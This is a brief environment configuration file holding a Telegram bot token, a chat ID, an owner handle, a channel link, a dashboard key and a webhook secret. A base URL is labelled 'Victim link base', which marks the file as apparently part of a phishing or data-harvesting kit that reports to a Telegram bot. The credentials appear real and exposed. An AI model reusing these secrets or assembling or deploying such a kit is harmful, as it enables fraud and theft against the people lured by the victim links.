BOT_TOKEN=8484672660:AAGgoQFyFTU8CbmaikA_bWeuT1XCQAiKrgI
CHAT_ID=8128648817
OWNER=@tneh_owner
CHANNEL=https://t.me/customsmsapi
DASHBOARD_KEY=tneh2024

# Victim link base (Vercel URL)
BASE_URL=https://your-app.vercel.app

# Webhook secret (random)
WEBHOOK_SECRET=dwr_secret_2024_tneh
